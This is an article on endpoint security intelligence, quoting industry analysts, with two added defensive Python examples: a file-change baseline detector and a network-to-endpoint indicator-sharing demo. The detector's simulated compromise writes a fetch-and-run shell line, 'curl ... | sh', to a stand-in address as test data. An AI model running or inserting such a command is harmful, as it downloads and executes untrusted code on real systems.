Gathering More Security Data From Your Endpoints

Published: 22/11/2024   Category: security




Endpoint security intelligence and controls have not kept pace with similar visibility and management of the network



Even though many of the most troublesome and advanced threats hitting enterprise networks originate from the endpoint, most organizations today aren't investing in the same kind of visibility and control over those devices that they spend on network-based controls. This disparity is leaving organizations with a huge blind spot where they need it most, experts say.
"We've seen this advancement in techniques for network-based detection, but we haven't seen quite that much advancement on the endpoint," says Scott Crawford, research director for Enterprise Management Associates. "And, yet, if you look at what the target is in most of these cases, the strategic target may be the user's privileges to sensitive data, so the tactical objective in a lot of cases is the endpoint. You're going to focus on compromising endpoint functionality to gain visibility into the user's activities and get access to their credentials."
According to Crawford, enterprises are missing this to a large degree, with most organizations maintaining a huge dependence on legacy techniques, such as antivirus. Part of it is the scale and distribution of endpoints -- it is much more difficult to deploy technology that gives a centralized view of what's happening across the endpoint infrastructure than it is to get network visibility. But if organizations don't try, they're going to miss a lot of the threat detection picture.
[Why do injection attacks still stand on top of the OWASP Top 10 2013? See Myth-Busting SQL- And Other Injection Attacks.]
"If you're not doing a similar job of collecting intel from the endpoint that you're collecting on the network, or you can't identify where or if the endpoint has been compromised, then one of the legs of your stool is a little short," Crawford says.
This is a message that John Prisco, CEO of Triumfant, has been preaching for some time now. He's a firm believer that organizations have to invest in gathering more information from their endpoints than they do today, so they can better detect the configuration and behavioral changes that flag malicious activity.
"You've got to be fighting the battle in the trenches, and the trenches in this case would be the endpoint," he says. "You have to have something on the endpoint that isn't antivirus that's looking at changes [to the endpoint]. It has got to be looking at everything and making decisions based on normal behavior changes."
He believes that even beyond traditional antivirus, many of the advanced endpoint protection measures out today depend on the same fatal flaw.
"It all comes down to the rule set that's being used -- success and failure depends on the rule set or the thing that's making the decision as to whether something is malware or not," Prisco says. "There are a lot of fatal flaws out there, and there's one thing that ties them all together and that's prior knowledge. The most advanced adversaries are going to defeat all those products because their rule set is predictive."
Of course, not all endpoint security plays depend on prior knowledge -- Prisco's very arguments about chasing the known bad are the same ones that application control and whitelisting players have been beating the drum about for a long time. Prisco claims that whitelisting isn't feasible for endpoints -- "It's really cumbersome. I don't know anybody who would try to make whitelisting products work on an endpoint" -- but it's a contentious point that is still up for debate.
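One way to build the kind of change monitoring Prisco describes, as an added example that is not code from the article or from Triumfant: snapshot the file-level state of an endpoint, diff a later snapshot against that baseline, and rank the differences. Nothing in it needs prior knowledge of what the malware looks like; it only needs to know what the host looked like before. The directory layout, the sample file contents and the simulated compromise are all constructed for the demo, and the executable-suffix list is an assumption; a real agent would also baseline autoruns, services, scheduled tasks and running processes, and would keep the baseline off-host so a compromised endpoint cannot rewrite it.

```python
"""Baseline-and-diff endpoint change detector (added illustration, not vendor code)."""
import hashlib
import os
import stat
import tempfile
from dataclasses import dataclass

# Treated as executable regardless of permission bits (assumption for the demo).
EXEC_SUFFIXES = {".exe", ".dll", ".sys", ".so", ".sh", ".ps1", ".bat"}


@dataclass(frozen=True)
class FileState:
    sha256: str
    size: int
    mode: int            # permission bits only


def hash_file(path, chunk=1 << 16):
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for block in iter(lambda: f.read(chunk), b""):
            h.update(block)
    return h.hexdigest()


def snapshot(root):
    """Record hash, size and permissions of every regular file under root."""
    state = {}
    for dirpath, _dirs, names in os.walk(root):
        for name in names:
            full = os.path.join(dirpath, name)
            st = os.lstat(full)
            if not stat.S_ISREG(st.st_mode):
                continue                         # skip symlinks, devices, sockets
            rel = os.path.relpath(full, root).replace(os.sep, "/")
            state[rel] = FileState(hash_file(full), st.st_size, stat.S_IMODE(st.st_mode))
    return state


def diff_snapshots(baseline, current):
    """Pure comparison of two snapshots: no signatures, no rule set about malware."""
    both = set(baseline) & set(current)
    return {
        "added": sorted(set(current) - set(baseline)),
        "removed": sorted(set(baseline) - set(current)),
        "modified": sorted(p for p in both if baseline[p] != current[p]),
    }


def is_executable(rel, st):
    return os.path.splitext(rel)[1].lower() in EXEC_SUFFIXES or bool(st.mode & 0o111)


def triage(changes, baseline, current):
    """Rank changes so new or altered executables surface before routine edits."""
    findings = []
    for p in changes["added"]:
        if is_executable(p, current[p]):
            findings.append(("HIGH", "new executable", p))
    for p in changes["modified"]:
        b, c = baseline[p], current[p]
        if is_executable(p, c) and b.sha256 != c.sha256:
            findings.append(("HIGH", "executable content changed", p))
        elif b.mode != c.mode:
            findings.append(("MEDIUM", f"permissions {oct(b.mode)} -> {oct(c.mode)}", p))
        else:
            findings.append(("LOW", "content changed", p))
    findings += [("LOW", "removed", p) for p in changes["removed"]]
    rank = {"HIGH": 0, "MEDIUM": 1, "LOW": 2}
    return sorted(findings, key=lambda f: (rank[f[0]], f[2]))


def demo():
    """Constructed endpoint: baseline it, simulate a compromise, triage the diff."""
    with tempfile.TemporaryDirectory() as root:
        def write(rel, data, mode=0o644):
            full = os.path.join(root, *rel.split("/"))
            os.makedirs(os.path.dirname(full), exist_ok=True)
            with open(full, "wb") as f:
                f.write(data)
            os.chmod(full, mode)

        write("bin/agent", b"#!/bin/sh\necho ok\n", 0o755)
        write("etc/hosts", b"127.0.0.1 localhost\n")
        write("home/user/notes.txt", b"todo\n")
        baseline = snapshot(root)
        # Simulated attacker activity: trojaned binary, new persistence script,
        # hosts-file tampering and a deleted file (all constructed).
        write("bin/agent", b"#!/bin/sh\ncurl -s http://198.51.100.7/p | sh\n", 0o755)
        write("home/user/.config/update.sh", b"#!/bin/sh\n", 0o755)
        write("etc/hosts", b"127.0.0.1 localhost\n0.0.0.0 av-updates.example\n")
        os.remove(os.path.join(root, "home", "user", "notes.txt"))
        current = snapshot(root)
        return triage(diff_snapshots(baseline, current), baseline, current)


if __name__ == "__main__":
    for severity, what, path in demo():
        print(f"{severity:6} {what:28} {path}")
```

On a busy workstation most LOW findings are legitimate updates, so the triage step and an allowlist of expected changes (patch windows, known updaters) are what keep the output usable; the detection itself stays rule-free in the sense Prisco means, because it compares the host to its own past rather than to a catalogue of known malware.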
Neil MacDonald of Gartner recently wrote that such claims about the cumbersome nature of application control are old-fashioned and based on previous iterations of the technology.
"Unfortunately, application control has a historical reputation of not being deployable or manageable for end-user systems," MacDonald says. "The reality is that application control can and will be successfully deployed for end-user systems and provides excellent protection from these types of [advanced] attacks."
Crawford sits in the middle, stating that at first blush application control vendors have the capability to offer some proactive level of control in high enforcement mode, but that there are limitations.
"Administering high enforcement mode across a number of endpoints does very likely have its limits because you run the risk of having end users contact the support desk and saying, 'I can't load software I really need, and it's interfering with business processes,'" Crawford says. "It's not the solution for every endpoint for every situation."
And in those cases where an infection still slips through the cracks of either whitelists or blacklists, that's where the importance of intelligence on the state of the endpoints lies. For their part, whitelisting vendors are teaming with others to offer that kind of intelligence and control. In fact, Bit9 just last week announced a partnership with FireEye and Palo Alto Networks to do so.
On his end, Prisco advocates for agent-based technology to offer the right information. Crawford says that it depends on the use case. For example, the off-host capabilities of network access control technology have come a long way from the early days of NAC, and can offer a degree of visibility into endpoints connecting onto the network.
"You've got to ask, what's the objective here? If you're looking to get a better handle on some sanity over what can access your network and what cannot, then the approach of doing preadmission inspection probably has some merit for maintaining visibility into the state of that endpoint," Crawford says. "But depending on how far you want to go in terms of visibility on that host and the level of control you want to exert on that host, then in those cases you are probably going to need some on-host capabilities."
In the end, threat intelligence plays a role in bridging the gap between network intelligence and endpoint malware detection capabilities -- whatever they are. According to Mike Rothman, analyst for Securosis, bidirectional communication between both is key.
"You want bidirectional communication so malware indicators found by the network device or in the cloud are accessible to endpoint agents," Rothman wrote recently in a piece on network-based malware detection. "Additionally, you want malware identified on devices to be sent to the network for further analysis, profiling, determination, and ultimately distribution of indicators to other protected devices."
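The two-way flow Rothman describes, as an added example that is not vendor code and is not based on the Bit9, FireEye or Palo Alto Networks integration mentioned above: a network sensor and two endpoint agents publish to and subscribe from one shared indicator store. The endpoint that flags a file from its own behavioral detection shares the hash; the sensor cannot see files but can send the sample for detonation and push the resulting C2 domain and address back out; the other endpoint matches the hash in its file inventory and the domain in its DNS cache, and the sensor matches the domain against flows it already logged. Component names, hashes, addresses, the flow log and the sandbox verdict are all constructed.

```python
"""Bidirectional indicator sharing between a network sensor and endpoint agents
(added illustration; the bus, message shapes and sample data are invented)."""
from dataclasses import dataclass


@dataclass(frozen=True)
class Indicator:
    kind: str      # "sha256", "domain" or "ip"
    value: str
    source: str    # component that first reported it


class IndicatorBus:
    """Minimal pub/sub store: a new (kind, value) pair fans out to every subscriber."""

    def __init__(self):
        self.known = {}            # (kind, value) -> Indicator
        self.subscribers = []

    def subscribe(self, component):
        self.subscribers.append(component)

    def publish(self, ind):
        key = (ind.kind, ind.value)
        if key in self.known:
            return False           # already distributed; avoids re-alert storms
        self.known[key] = ind
        for sub in self.subscribers:
            sub.on_indicator(ind)
        return True


class NetworkSensor:
    """Sees flows, not files: matches domain/IP indicators against its connection log
    and queues unknown file hashes for (simulated) sandbox analysis."""

    def __init__(self, name, bus, flows):
        self.name, self.bus, self.flows = name, bus, flows   # flows: (host, domain, ip)
        self.alerts, self.pending_samples = [], []
        bus.subscribe(self)

    def on_indicator(self, ind):
        if ind.kind == "sha256":
            self.pending_samples.append(ind.value)           # endpoint -> network
            return
        for host, domain, ip in self.flows:                  # retro-hunt the flow log
            if (ind.kind, ind.value) in {("domain", domain), ("ip", ip)}:
                self.alerts.append((host, ind.kind, ind.value, ind.source))

    def sandbox_verdict(self, sha, c2_domain, c2_ip):
        """Detonation of a queued sample yielded its C2; push that to all endpoints."""
        if sha not in self.pending_samples:
            raise ValueError("verdict for a sample this sensor never received")
        for kind, value in (("domain", c2_domain), ("ip", c2_ip)):
            self.bus.publish(Indicator(kind, value, self.name))   # network -> endpoints


class EndpointAgent:
    """Sees its own files and DNS cache, not network flows."""

    def __init__(self, name, bus, files, dns_cache):
        self.name, self.bus = name, bus
        self.files, self.dns_cache = files, set(dns_cache)   # files: path -> sha256
        self.alerts = []
        bus.subscribe(self)

    def on_indicator(self, ind):
        if ind.kind == "sha256":
            for path, sha in self.files.items():
                if sha == ind.value:
                    self.alerts.append((path, ind.kind, ind.value, ind.source))
        elif ind.kind == "domain" and ind.value in self.dns_cache:
            self.alerts.append(("dns-cache", ind.kind, ind.value, ind.source))

    def report_local_detection(self, path):
        """Local behavioral engine flagged a file: share its hash so other hosts can look."""
        return self.bus.publish(Indicator("sha256", self.files[path], self.name))


def run_scenario():
    """Constructed scenario: host-a finds a file, the network enriches it, host-b benefits."""
    bus = IndicatorBus()
    bad_sha = "a" * 64                                       # constructed sample hash
    sensor = NetworkSensor("ngfw", bus, flows=[
        ("host-a", "cdn.example", "198.51.100.1"),
        ("host-b", "evil-c2.example", "203.0.113.5"),
    ])
    host_a = EndpointAgent("host-a", bus, {"/tmp/update": bad_sha, "/bin/ls": "b" * 64},
                           ["cdn.example"])
    host_b = EndpointAgent("host-b", bus, {"/opt/sync/helper": bad_sha},
                           ["evil-c2.example"])
    host_a.report_local_detection("/tmp/update")
    sensor.sandbox_verdict(bad_sha, "evil-c2.example", "203.0.113.5")
    return {"bus": sorted(bus.known), "sensor": sensor.alerts,
            "host-a": host_a.alerts, "host-b": host_b.alerts}


if __name__ == "__main__":
    for component, alerts in run_scenario().items():
        print(component, alerts)
```

The point of the shared store is that each side contributes what only it can see: the endpoint knows which file misbehaved, the sensor knows which hosts already talked to the C2 that detonation revealed, and neither detection would have reached host-b on its own. Deduplicating on (kind, value) rather than on the full record is deliberate, so that the same domain reported by two sources does not trigger every subscriber twice.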
Have a comment on this story? Please click "Add Your Comment" below. If you'd like to contact Dark Reading's editors directly, send us a message.
